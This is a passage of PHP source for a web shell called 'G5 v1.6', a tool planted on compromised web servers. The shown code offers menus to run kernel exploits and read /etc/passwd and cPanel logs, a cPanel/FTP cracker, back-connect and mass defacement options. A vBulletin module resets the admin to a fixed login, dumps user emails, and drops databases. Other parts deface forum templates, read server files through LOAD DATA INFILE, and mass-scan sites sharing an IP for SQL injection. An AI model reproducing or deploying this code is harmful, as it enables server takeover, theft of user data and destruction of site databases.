(L1)<option VALUE='./k3 2'>Kernel attack (Krad.c) PT2 (L2)<option VALUE='./k3 3'>Kernel attack (Krad.c) PT2 (L3)<option VALUE='./k3 4'>Kernel attack (Krad.c) PT2 (L4)<option VALUE='./k3 5'>Kernel attack (Krad.c) PT2 (L5)<option value='cat /etc/passwd'>/etc/passwd</option><option value='cat /var/cpanel/accounting.log'>/var/cpanel/accounting.log</option><option value='cat /etc/syslog.conf'>/etc/syslog.conf</option><option value='cat /etc/hosts'>/etc/hosts</option><option value='cat /etc/named.conf'>/etc/named.conf</option><option value='cat /etc/httpd/conf/httpd.conf'>/etc/httpd/conf/httpd.conf</option></select>";
1089sub('aliA','Run ');
1090echo "</form>";
1091}
1092
1093function db_lg()
1094{
1095echo $query=$_REQUEST['sqquery'];
1096echo "<form action=\"".$php."\" method=\"post\">";
1097echo "<br><div align=center>";
1098$n = 'mysql';
1099$u = 'User Name';
1100$p = 'Password';
1101if(!empty($_POST['sqdbn'])){$n = $db;}
1102if(!empty($_POST['sqlog'])){$u = $user;}
1103if(!empty($_POST['sqpwd'])){$p = $pass;}
1104
1105echo "<select name=sqlty>
1106
1107<option valut=MySQL onClick='document.client.sqlserv.disabled = false;' ";
1108if ($_REQUEST['sqlty']=='MySQL')echo 'selected';echo ">MySQL</option>
1109
1110<option valut=MSSQL onClick='document.client.sqlserv.disabled = false;' ";
1111if ($_REQUEST['sqlty']=='MSSQL')echo 'selected';
1112echo ">MSSQL</option>
1113<option valut=Oracle onClick='document.client.sqlserv.disabled = true;' ";
1114if ($_REQUEST['sqlty']=='Oracle')echo 'selected';
1115echo ">Oracle</option>
1116<option valut=PostgreSQL onClick='document.client.sqlserv.disabled = false;' ";
1117if ($_REQUEST['sqlty']=='PostgreSQL')echo 'selected';
1118echo ">PostgreSQL</option>
1119<option valut=DB2 onClick='document.client.sqlserv.disabled = false;' ";
1120if ($_REQUEST['sqlty']=='DB2')echo 'selected';
1121echo ">IBM DB2</option></select>";
1122
1123inp('text','19','sqdbn',$n);
1124inp('text','19','sqlog',$u);
1125inp('text','18','sqpwd',$p);
1126inp('text','15','sqsrv','localhost');
1127inp('text','15','sqprt','3306');
1128sub('sqlwxp','SQL Explorer');
1129
1130are('sqquery',("SHOW DATABASES"),'100','5','<br>');
1131sub('sqconf','Run SQL Query');
1132echo "<select name=sqldp>
1133<option value=SQL>SQL</option>
1134<option value=GZIP>GZIP</option>";
1135sub('dumd',' Dump','<br>');
1136echo " ";
1137inp('text','75','cfils',path,'');sub('gfils',' Get file','<br>');
1138echo "</div>";}
1139
1140function vbsql()
1141{
1142echo "<form action=\"".$php."\" method=\"post\">
1143<div align =\"center\"><b>VB Opreators (VB Only)</b>";
1144echo '<div align=left>';
1145
1146echo "<b>DataBase options</b><br>";
1147$n = 'mysql';
1148$u = 'User Name';
1149$p = 'Password';
1150if(!empty($_POST['tab1'])){$t = $tb;}
1151if(!empty($_POST['sqdbn'])){$n = $db;}
1152if(!empty($_POST['sqlog'])){$u = $user;}
1153if(!empty($_POST['sqpwd'])){$p = $pass;}
1154
1155
1156echo "<br>";
1157inp('radio','10','vbss','vbca','Change Admin','<br>');
1158inp('radio','10','vbss','vbgm','GET maillist','<br>');
1159inp('radio','10','vbss','vbrb','Remove Courent DB');
1160inp('radio','10','vbss','vbro','Remove Other DB'); inp('text','15','odb',$n,'','<br>');
1161inp('radio','10','vbss','vbrt','Remove Table',':::::-------:::::');inp('text','15','tab1',$t,'TABLE Name:');
1162echo "<br>";echo "<br>";
1163inp('text','19','sqdbn',$n);
1164inp('text','19','sqlog',$u);
1165inp('text','18','sqpwd',$p);
1166
1167inp('text','15','sqsrv','localhost');
1168inp('text','15','sqprt','3306');
1169echo "<br><br><div align =\"center\">";
1170sub('vbsq','DO IT!','<br>');
1171echo "</form><br><br>";
1172echo "<a href=\"".$php."\">Home</a>";
1173 echo "<p align=\"center\"><a href=\"javascript: history.go(-1)\">Back</a></p>"; ft(); die;}
1174
1175function rs($anm ,$col,$row,$st='')
1176{if(isset($_REQUEST["gfil"]) || isset($_REQUEST['gfils'])|| isset($_REQUEST['show'])){$rdo = '';}else $rdo = 'readonly';
1177
1178 $rs = "<textarea name=\"".$anm."\" cols=\"".$col."\" rows=\"".$row."\" $rdo>";
1179echo $rs;}
1180function inp($ty,$sz,$nm,$vu,$ti='',$pr='')
1181{if($ty == 'radio' || $ty == 'checkbox'){$tit = $ti;
1182 $tt = ' '.$tit.' ';unset($ti);}
1183$inp = "$ti<input type=".$ty." name=".$nm." ";if($sz != 0) { $inp .= "size=".$sz." "; }$inp .= "value=\"".$vu."\">$tt".$pr."";echo $inp;}
1184function sub($cnm,$cvu,$pr='')
1185{$sub = "<input type=\"submit\" value=\"".$cvu."\" name=\"".$cnm."\" />$pr";echo $sub;}
1186function are($anm,$avu,$col,$row,$pr ='')
1187{$are = "<br><textarea name=\"".$anm."\" cols=\"".$col."\" rows=\"".$row."\" $sr>".$avu."</textarea><br>";echo $are;}
1188
1189function sl()
1190{$selhk = "
1191<form name=\"site\" action=\"".$php."\"method=\"post\"><select size=\"1\" name=\"fsOP\" title=\"FileS Action\" >
1192<option>Select</option>
1193<option value=\"cmdr\">Commander</option>
1194<option value=\"frc\">File Explorer</option>
1195<option value=\"seaa\">Search</option><option value=\"ftm\">Cpanel + FTP Cracker</option><option value=\"fts\">Mass Index</option><option value=\"cry\">Crypt</option><option value=\"fbk\">Eval PHP</option><option value=\"fcf\">Htaccess Option</option><option value=\"mil\">Mailer</option><option value=\"fsf\">Zone-H</option></select><input type=\"submit\" name=\"allss\" value=\"GO\" /><select size=\"1\" name=\"dbOP\" title=\"DBaseS Action\" ><option>Select</option><option value=\"dau\">phpMyAdmin</option><option value=\"dmi\">vBulletin®</option><option value=\"ddu\">Back Connect</option><option value=\"ddr\">Users</option><option value=\"dml\">SQL Injction</option><option value=\"dqu\">Port Scan</option>
1196<option value=\"etr\">Extract Remote Site</option></select>
1197
1198<input type=\"submit\" name=\"allqw\" value=\"GO\" /></form>";
1199echo $selhk; }
1200
1201function icod()
1202{echo "<form action=\"".$php."\" method=\"post\">
1203<div align =\"center\"><b>Upload File";
1204are('code','Post your code here','50','20','<br>');
1205inp('text','40','upf',path,'File Name');echo "<br>";
1206sub('upff','upload','<br>');
1207echo "<a href=\"javascript: history.go(-1)\">Back</a></div>";}
1208
1209function wdll_bdx($colr)
1210{echo "<div align=\"center\">
1211<table width=\"70%\" bgcolor=\"".$colr."\" border=\"1\" bordercolor=\"#D78989\" bordercolordark=\"#440606\" bordercolorlight=\"#EEE1E1\" datapagesize=\"10\" name=\"aaa\" title=\"Easy Come Easy GO\"><tr><td>";}
1212
1213function wdll_bdy()
1214{echo "</td></tr></table></div>";}
1215function wdll_repxl(){echo ("<table width=\"70%\" bgcolor=black cellspacing=\"1\" cellpadding=\"1\">\n<tr><th>Dir and Files</th><th>Type</th><th>Mode</th><th>Size</th></th><th>Last modified</th><th>Action</th>\n");}
1216
1217function wdll_repxt($file){$siz = wdll_s1z(@filesize($file));$perm = substr(decoct(@fileperms($file)), -3, 3);
1218echo "<tr><td class=tdx><a href=\"".$php."?dir=".@base64_encode(@realpath($file))."\">".$file."</a></td><td class=tdx>DIR</td><td class=tdx><font color =\"".wdll_permc($file)."\">".$perm."</font></td><td class=tdx><font color =ffffff>".$siz."</font></td><td class=tdx><font color =orange>".@date ("Y/m/d, H:i:s", @filemtime($file))."</font></td><td class=tdx>...</td>";}
1219
1220function wdll_repxtr($file){
1221 $xtr = @pathinfo($file);$extt = $xtr["extension"];$siz = wdll_s1z(@filesize($file));$perm = substr(decoct(@fileperms($file)), -3, 3);
1222 echo "<tr><td class=tdx><a href=\"".$php."?show=".@base64_encode(@realpath($file))."\">".$file."</a></td><td class=tdx>".$extt."</td><td class=tdx><font color =\"".wdll_permc($file)."\">".$perm."</font></td><td class=tdx><font color =gold>".$siz."</font></td><td class=tdx><font color =orange>".@date ("Y/m/d, H:i:s", @filemtime($file))."</font></td><td class=tdx><a target=\"_blank\"href=\"".$php."?action=".@base64_encode(urlencode(@realpath($file))). "\">Action</a></td>";}
1223
1224function head($col4)
1225{
1226 $x5 = "<style type=\"text/css\">* { margin: 0; padding: 0; }TD { FONT-SIZE: 8pt; COLOR: #993333; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #993333; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}input{background-color: #993333; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: black; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #993333; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: $col4;}.trx ,{BORDER-RIGHT:red 1px solid;BORDER-LEFT: red 1px solid;BORDER-BOTTOM: green 1px solid;}.tdx {BORDER-RIGHT:red 1px solid;BORDER-LEFT:green 1px solid;BORDER-BOTTOM: red 1px solid;}A:link {COLOR:gold;TEXT-DECORATION: none}A:visited { COLOR:green; TEXT-DECORATION: none}A:active {COLOR:red; TEXT-DECORATION: none}A:hover {color:ffffff;TEXT-DECORATION: none}</style>";
1227
1228 $x4 = "<style type='text/css'>* { margin: 0; padding: 0; }* { margin: 0; padding: 0; }
1229body {background:#000 url(img/background-body-repeat.png) repeat-y top center;color:#fff;font-size:11px;font-family:'Lucida Grande', 'Lucida Sans', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;text-shadow:#000 0 1px 0;}
1230input {-moz-border-radius:5px;border:0;color:#CCC;background:url(http://lh5.ggpht.com/_Kwwy9VyLMKw/S9nq5_g05bI/AAAAAAAAC_s/CiExZz5uY0Y/background-container.png) no-repeat scroll left top transparent;padding:3px;}
1231body,table { font-family:verdana;font-size:11px;color:silver;background-color:$col4; }table { width:100%; }table,td { border:1px solid #808080;margin-top:2;margin-bottom:2;padding:5px; }a { color:lightblue;text-decoration:none; }a:active { color:#00FF00; }a:link { color:#5B5BFF; }a:hover { text-decoration:underline; }a:visited { color:#99CCFF; }input,select,option { font:8pt tahoma;color:#ffffff;margin:2;border:1px solid #666666; }textarea { color:#dedbde;font:fixedsys bold;border:1px solid #666666;margin:2; }.fleft { float:left;text-align:left; }.fright { float:right;text-align:right; }#pagebar { font:10pt tahoma;padding:5px; border:3px solid #1E1E1E; border-collapse:collapse; }#pagebar td { vertical-align:top; }#pagebar p { font:8pt tahoma;}#pagebar a { font-weight:bold;color:#00FF00; }#pagebar a:visited { color:#00CE00; }#mainmenu { text-align:center; }#mainmenu a { text-align: center;padding: 0px 5px 0px 5px; }#maininfo,.barheader,.barheader2 { text-align:center; }#maininfo td { padding:3px; }.barheader { font-weight:bold;padding:5px; }.barheader2 { padding:5px;border:2px solid #1F1F1F; }.contents,.explorer { border-collapse:collapse;}.contents td { vertical-align:top; }.mainpanel { border-collapse:collapse;padding:5px; }.barheader,.mainpanel table,td { border:1px solid #333333; }.mainpanel input,select,option { border:1px solid #333333;margin:0; }input[type='submit'] { border:1px solid #000000; } input[type='text'] { padding:3px;}.shell { background-color:#C0C0C0;color:#000080;padding:5px; }.fxerrmsg { color:red; font-weight:bold; }#pagebar,#pagebar p,h1,h2,h3,h4,form { margin:0; }#pagebar,.mainpanel,input[type='submit'] { background-color:#4A4A4A; }.barheader2,input,select,option,input[type='submit']:hover { background-color:#333333; }textarea,.mainpanel input,select,option { background:#000 url(http://lh3.ggpht.com/_Kwwy9VyLMKw/S9nq5h6budI/AAAAAAAAC_o/JnTYblUixFc/background-body-repeat.png) repeat-y top center;color:#fff;font-size:12px;text-shadow:#000 0 1px 0; }</style>";
1232
1233 if(style == 'x5') {$style = $x5;}
1234 elseif(style == 'x4'){$style = $x4;}
1235echo "<head><title>G5</title>
1236<div style=\"background: red;\"><p align=\"center\">
1237<font size=\"3\" color =\"orange\"><b>G5 v1.6</font></b></p><hr color=\"black\"</div></div><center>";
1238echo $style;
1239echo "</head>";}
1240
1241
1242
1243function check_url($url,$source){ //Thanks Lagripe-Dz
1244if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$source)) {
1245echo "[+] Found -> ".$url."\n";
1246}
1247else{ echo "[~] Not Found -> ".$url."\n"; }
1248}
1249
1250function check_sql_inj($site){
1251 $result = @file_get_contents("$site%27");
1252 check_url($site,$result);}
1253
1254function mystripos($haystack, $needle){
1255return strpos($haystack, stristr( $haystack, $needle ));}
1256
1257function sec($ent)
1258{$bb = str_replace("http://", "", $ent);
1259$cc = str_replace("www.", "", $bb);
1260$dd = substr($cc, 0, mystripos($cc, "/"));
1261return $dd;
1262}
1263
1264
1265function ft()
1266{ echo "<br><br><br><div style=\"background: brown;\"><p align=\"center\">
1267
1268<font size=\"2\" color =\"ffffff\"><b>w.dll@live.com 2011 | <a target=_blank href='http://piaster.blogspot.com'>Site</a></b></font></p></div></div>";}
1269
1270function wdll_rep($dir, $path, $file)
1271{
1272$lf = @filemtime($dir);
1273$time = @date("d/m/Y", $lf);
1274$xtr = @pathinfo($file);
1275$extt = $xtr["extension"];
1276$siz = wdll_s1z(@filesize($dir));
1277$perm = substr(decoct(@fileperms($dir)), -3, 3);
1278$webpath = @getenv("SERVER_NAME");
1279$fullp = $webpath.'/'.$dir;
1280echo ("<tr><td class=tdx><font color = gold><a href=\"".$php."?dir=".@base64_encode(@realpath($path))."\">".$path."</a></font></td><td class=tdx><font color =\"orange\"><a href=\"".$php."?show=".@base64_encode($dir)."\">".$file."</a></font></a></td><td class=tdx><font color = gold>$extt</font></td><td class=tdx><font color =orange>$siz</font></td><td class=tdx><center><font color =gray>" .
1281@date("d/m/Y", @filectime($dir)) . "</font></td><td class=tdx><center><font color =red>" . @date("d/m/Y",
1282@filemtime($dir)) . "</font></td><td class=tdx><center><font color =gold>$perm</font></td><td class=tdx><center><a target=\"_blank\" href='$fullp'>view</td><td class=tdx><center><font color =red><center><a target=\"_blank\"href=\"" .
1283$php . "?action=" . urlencode(@base64_encode($dir)) . "\">Action</a></font></td>");}
1284
1285function wdll_repx()
1286{echo ("<table bgcolor=black width=\"70%\" cellspacing=\"1\" cellpadding=\"1\">\n<tr><th>Dir</th><th>Filename</th><th>Type</th><th>Size</th><th>Inode</th><th>Modify</th></th><th>Mode</th><th>link</th><th>Action</th>\n");}
1287
1288function vb_opt()
1289{ global $log,$db;
1290$tbl= $_POST['tab1'];
1291$odbs= $_POST['odb'];
1292if (!$log){echo 'Could not connect: ' . @mysql_error();}
1293echo "Login DB Done\n...";
1294switch ($_REQUEST["vbss"]){
1295case 'vbca': { $vb_wdl = 'UPDATE '.$db.'.user SET username = "wdll",password = "691fed95cba5e31004e7072abd5e98db",salt = "fdd" WHERE user.userid =1 LIMIT 1 ';
1296 $qry = @mysql_query($vb_wdl,$log);
1297if ($qry)
1298{ echo "Runing Work ...\n"; } if(@@mysql_affected_rows($log) != 1)
1299{echo "Done \nUser Name: wdll \nPassword: nora\n..... Enjoy.";}
1300} break;
1301case 'vbgm': { $vb_wdl = 'SELECT * FROM user ;';
1302 $qry = @mysql_query($vb_wdl , $log);
1303echo'<table border="0" bgcolor="black"><th>ID</th><th>User</th><th>E-mail</th>';
1304while ($row = @mysql_fetch_array($qry))
1305{echo'<tr><td>' . $row['userid'] . '</td><td>' . $row['username'] . '</td><td>' . $row['email'] . '</td></tr>';}
1306echo "</table><table border=\"1\" bgcolor=\"800000\"><th>
1307Total : [".@mysql_num_rows($qry)."]</th></table><br>";
1308@mysql_free_result($qry);
1309@mysql_close($log);} break;
1310 case 'vbro': { $vb_wdl = 'DROP DATABASE '.$odbs.'';
1311 $qry = @mysql_query($vb_wdl ,$log);if($qry) {echo "WORK! Done :).... <br> DATABASE '$odbs' GONE AWAY ^_^";}else {echo '..... Nothing To DO ...*_*';@mysql_close($log);}
1312 } break;
1313 case 'vbrb': { $vb_wdl = 'DROP DATABASE '.$db.'';
1314 $qry = @mysql_query($vb_wdl, $log);if($qry) {echo "WORK! Done :).... <br> DATABASE '$db' GONE AWAY ^_^";}else {echo '.....Nope ... *_*';@mysql_close($log);}
1315 } break;
1316 case 'vbrt': { $vb_wdl = 'DROP TABLE '.$tbl.' ';
1317 $qry = @mysql_query($vb_wdl , $log);if($qry) {echo "WORK! Done :).... <br> TABLE '$tbl' GONE AWAY ^_^";}else {echo '.....Nope ... *_*';@mysql_close($log);}} break; }
1318echo "<br><a href=\"javascript: history.go(-1)\">Back</a></div>"; }
1319
1320function sqlj_do($ip){ // Thanks Lagripe-Dz
1321
1322$npages = 500000;
1323$npage = 1;
1324$allLinks = array();
1325
1326
1327 while($npage <= $npages)
1328 {
1329 $ch = curl_init();
1330 curl_setopt($ch, CURLOPT_URL, 'http://www.bing.com/search?q=ip%3A' . $ip . '+id=&first=' . $npage);
1331 curl_setopt($ch, CURLOPT_HEADER, 1);
1332 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1333 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1334 curl_setopt($ch, CURLOPT_REFERER, 'http://www.bing.com/');
1335 curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
1336 $result['EXE'] = curl_exec($ch);
1337 $result['ERR'] = curl_error($ch);
1338 curl_close($ch);
1339
1340 if ( empty( $result['ERR'] ) )
1341 {preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $result['EXE'], $findlink);
1342 for ($i = 0; $i < count($findlink[1]); $i++)
1343 array_push($allLinks,$findlink[1][$i]);
1344 $npage = $npage + 10;
1345 if (preg_match('(first=' . $npage . '&)siU', $result['EXE'], $linksuiv) == 0) break;}
1346 else break;}
1347
1348$allDmns = array();
1349 foreach ($allLinks as $kk => $vv){
1350 $allDmns[] = $vv;
1351 }
1352 $resultPages = array_unique($allDmns);
1353 sort($resultPages) ;
1354
1355
1356for ($x = 0; $x < count($resultPages); $x++){
1357$h3h3 = $resultPages[$x];
1358check_sql_inj($h3h3);
1359}
1360
1361echo "\nINFO / IP : ".$ip." / Total Domain Scaned : ".count($resultPages)."\nFINISHED ";}
1362
1363//------------------------------------Thanx Itsec Team |ADAPTED|-------------------------------------------
1364
1365function sqlexp(){
1366global $log;
1367if(!empty($_REQUEST['sqsrv']) && !empty($_REQUEST['sqlog']) && isset($_REQUEST['sqpwd']) && !empty($_REQUEST['sqquery']))
1368{$sqlserv=$_REQUEST['sqsrv'];$sqlty=$_REQUEST['sqlty'];$pass=$_REQUEST['sqpwd'];$user=$_REQUEST['sqlog'];$query=$_REQUEST['sqquery'];
1369$db=(empty($_REQUEST['sqdbn']))?'':$_REQUEST['sqdbn'];
1370$_SESSION[sqlserv]=$_REQUEST['sqsrv'];$_SESSION[sqlty]=$_REQUEST['sqlty'];$_SESSION[qpwd]=$_REQUEST['sqpwd'];$_SESSION[userr]=$user;}
1371
1372if (isset ($_GET['select_db'])){$getdb=$_GET['select_db'];$_SESSION[db]=$getdb;$query="SHOW TABLES";$res=sqlqu($_SESSION[sqlty],$_SESSION[sqlserv],$_SESSION[userr],$_SESSION[qpwd],$_SESSION[db],$query);}
1373elseif (isset ($_GET[select_tbl])){$tbl=$_GET[select_tbl];$_SESSION[tbl]=$tbl;
1374$query="SELECT * FROM `$tbl`";$res=sqlqu($_SESSION[sqlty],$_SESSION[sqlserv],$_SESSION[userr],$_SESSION[qpwd],$_SESSION[db],$query);}
1375elseif (isset ($_GET[drop_db])){
1376$getdb=$_GET[drop_db];$_SESSION[db]=$getdb;$query="DROP DATABASE `$getdb`";
1377sqlqu($_SESSION[sqlty],$_SESSION[sqlserv],$_SESSION[userr],$_SESSION[qpwd],'',$query);
1378$res=sqlqu($_SESSION[sqlty],$_SESSION[sqlserv],$_SESSION[userr],$_SESSION[qpwd],'','SHOW DATABASES');}
1379elseif (isset ($_GET[drop_tbl])){$getbl=$_GET[drop_tbl];$query="DROP TABLE `$getbl`";
1380sqlqu($_SESSION[sqlty],$_SESSION[sqlserv],$_SESSION[userr],$_SESSION[qpwd],$_SESSION[db],$query);
1381$res=sqlqu($_SESSION[sqlty],$_SESSION[sqlserv],$_SESSION[userr],$_SESSION[qpwd],$_SESSION[db],'SHOW TABLES');}
1382elseif (isset ($_GET[drop_row])){$getrow=$_GET[drop_row];$getclm=$_GET[clm];$query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'";$tbl=$_SESSION[tbl];
1383sqlqu($_SESSION[sqlty],$_SESSION[sqlserv],$_SESSION[userr],$_SESSION[qpwd],$_SESSION[db],$query);
1384$res=sqlqu($_SESSION[sqlty],$_SESSION[sqlserv],$_SESSION[userr],$_SESSION[qpwd],$_SESSION[db],"SELECT * FROM `$tbl`");}
1385else$res=sqlqu($sqlty,$sqlserv,$user,$pass,$db,$query);
1386if($res){$res=htmlspecialchars($res);$row=array ();$title=explode('*',$res);$trow=explode('-',$title[1]);$row=explode('-+',$title[0]);$data=array();$field=$trow[count($trow)-2];
1387if (strstr($trow[0],'Database')!='')$obj='db';
1388elseif (substr($trow[0],0,6)=='Tables')
1389$obj='tbl';else$obj='row';$i=0;foreach ($row as $a){if($a!='')$data[$i++]=explode('+',$a);}
1390
1391echo "<table border=1 bordercolor='brown' cellpadding='2' bgcolor='silver' width='100%' style='border-collapse: collapse'><tr>";
1392foreach ($trow as $ti)echo "<td bgcolor='brown'>$ti</td>";echo "</tr>";$j=0;
1393while ($data[$j]){echo "<tr>";foreach ($data[$j++] as $dr){echo "<td>";if($obj!='row') echo "<a href='$php?do=db&select_$obj=$dr'>";echo $dr;if($obj!='row') echo "</a>";echo "</td>";}echo "<td><a href='$php?do=db&drop_$obj=$dr";
1394if($obj=='row')echo "&clm=$field";echo "'>Drop</a></td></tr>";}echo "</table><br>";}}
1395
1396function sqlqu($sqlty,$host,$user,$pass,$db='',$query){
1397$res='';
1398switch($sqlty){
1399case 'MySQL':
1400if(!function_exists('mysql_connect'))return 0;
1401$link=@mysql_connect($host,$user,$pass);
1402if($link){
1403if(!empty($db))@mysql_select_db($db,$link);
1404$result=@mysql_query($query,$link);
1405if ($result!=1){
1406while($data=@mysql_fetch_row($result))$res.=implode('+',$data).'-+';
1407$res.='*';
1408for($i=0;$i<@mysql_num_fields($result);$i++)
1409$res.=@mysql_field_name($result,$i).'-';}
1410@mysql_close($link);
1411return $res;}break;
1412case 'MSSQL':
1413if(!function_exists('mssql_connect'))return 0;
1414$link=@mssql_connect($host,$user,$pass);
1415if($link){
1416if(!empty($db))@mssql_select_db($db,$link);
1417$result=@mssql_query($query,$link);
1418while($data=@mssql_fetch_row($result))$res.=implode('+',$data).'-+';
1419$res.='*';
1420for($i=0;$i<@mssql_num_fields($result);$i++)
1421$res.=@mssql_field_name($result,$i).'-';
1422@mssql_close($link);
1423return $res;
1424}
1425break;
1426case 'Oracle':
1427if(!function_exists('ocilogon'))return 0;
1428$link=@ocilogon($user,$pass,$db);
1429if($link){
1430$stm=@ociparse($link,$query);
1431@ociexecute($stm,OCI_DEFAULT);
1432while($data=@ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('+',$data).'-+';
1433$res.='*';
1434for($i=0;$i<oci_num_fields($stm);$i++)
1435$res.=@oci_field_name($stm,$i).'-';
1436return $res;
1437}
1438break;
1439case 'PostgreSQL':
1440if(!function_exists('pg_connect'))return 0;
1441$link=@pg_connect("host=$host dbname=$db user=$user password=$pass");
1442if($link){
1443$result=@pg_query($link,$query);
1444while($data=@pg_fetch_row($result))$res.=implode('+',$data).'-+';
1445$res.='*';
1446for($i=0;$i<@pg_num_fields($result);$i++)
1447$res.=@pg_field_name($result,$i).'-';
1448@pg_close($link);
1449return $res;
1450}
1451break;
1452case 'DB2':
1453if(!function_exists('db2_connect'))return 0;
1454$link=@db2_connect($db,$user,$pass);
1455if($link){
1456$result=@db2_exec($link,$query);
1457while($data=@db2_fetch_row($result))$res.=implode('+',$data).'-+';
1458$res.='*';
1459for($i=0;$i<@db2_num_fields($result);$i++)
1460$res.=@db2_field_name($result,$i).'-';
1461@db2_close($link);
1462return $res;
1463}
1464break;
1465}
1466return 0;
1467}
1468//------------------------------------END Itsec Team -------------------------------------------
1469
1470function wdll_dbc()
1471{
1472global $log;
1473if($log){ $querys = @explode(';',sql_query); foreach($querys as $num=>$query) { if(strlen($query)>5){ echo "<br>Query# ::<font face=Verdana size=-2 color=green><b>".$num." : ".htmlspecialchars($query)."</b></font><br>";
1474$qry = @mysql_query($query,$log); $error = @mysql_error($log); if($error) {
1475 echo "<table width=50% bgcolor=black ><tr class=trx><td class=tdx><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
1476else {if (@mysql_num_rows($qry) > 0) { $sql2 = $sql = $keys = $values = ''; while (($row = @mysql_fetch_assoc($qry))) { $keys = @implode(" </b></font></td><td class=tdx bgcolor=red><font face=Verdana size=-2><b> ", @array_keys($row));
1477$values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
1478$values = @implode(" </font></td><td class=tdx><font face=Verdana size=-2> ",$values);
1479$sql2 .= "<tr class=trx><td class=tdx><font face=Verdana size=-2> ".$values." </font></td></tr>";
1480} echo "<table width=100%>";$sql = "<tr class=trx><td class=tdx bgcolor=orange><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";$sql .= $sql2;echo $sql;echo "</table><br>";if(($rows = @mysql_affected_rows($log))>=0) { echo "<table width=100%><tr class=trx><td class=tdx><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; }}else { if(($rows = @mysql_affected_rows($log))>=0) { echo "<table width=100% bgcolor=black ><tr class=trx><td class=tdx><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }}@mysql_free_result($qry);}} @mysql_close($log);} else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>";}
1481
1482function db_mass($coded,$msi)
1483{global $db,$log;
1484if (!$log){echo 'Could not connect:' . @mysql_error($log);}else
1485echo "Login DB Done ^_*<br>";
1486$other = stripcslashes($_POST['msqur']);
1487$wdll ='';
1488switch($msi){
1489case('msvb'):{
1490$wdll ='UPDATE '.$db.'.template SET template = \''.$coded.'\' WHERE title = "FORUMHOME"';
1491$wdlll = 'UPDATE '.$db.'.template SET template =\''.$coded.'\' WHERE title ="spacer_open"'; }break;//VB
1492case('msbb'):{}break;
1493case('msin'):{}break;
1494case('mswp'):{}break;
1495case('msjo'):{}break;
1496case('msrd'):{$wdll = 'DROP DATABASE '.$db.'';}break;
1497case('msot'):{$wdll = $other;}break;}
1498$qry = @mysql_query($wdll, $log);if($qry) {echo "WORK! Done<br>";}
1499if($msi = 'msvb'){
1500$qry = @mysql_query($wdlll , $log);}
1501if($qry){echo "<br>L00K ...<a href = 'http://" . $_SERVER['HTTP_HOST'] . "'target= _balnk>http://" . $_SERVER['HTTP_HOST'] . "</a> Enjoy...^_^";
1502}@mysql_close($log);
1503unset($wdll);
1504echo "<br><br><a href=\"javascript: history.go(-1)\">Back</a>";}
1505
1506function sqlf($filehd)
1507 { global $log ;
1508if (!$log){echo 'Could not connect: ' . @mysql_error($log);}
1509$qrt = 'CREATE TABLE `wdll` ('. ' `wdll` LONGBLOB NOT NULL'. ' );';
1510$qry = "LOAD DATA INFILE \"".$filehd."\" INTO TABLE wdll";
1511$qrf = "SELECT * FROM wdll;";
1512$qrd = "DROP TABLE wdll;";
1513 @mysql_query($qrt , $log);
1514 @mysql_query($qry, $log);
1515 $rs= @mysql_query($qrf, $log);
1516 if (!$rs) {echo "\nError in reading file (permision denied)!\n";}
1517 else
1518 {$file = "";
1519 while ($row = @mysql_fetch_array($rs, MYSQL_ASSOC))
1520 {$file .= @join ("\r\n",$row);}
1521 if (empty($file))
1522 {echo "\nFile \"".$filehd."\" does not exists or empty!\n";}
1523 else
1524 {echo $file;}
1525 @mysql_free_result($rs);
1526 @mysql_query($qrd, $log);}}
1527
1528function bbc($bo ,$ip ='' ){
1529
1530if($_REQUEST['lbg'])
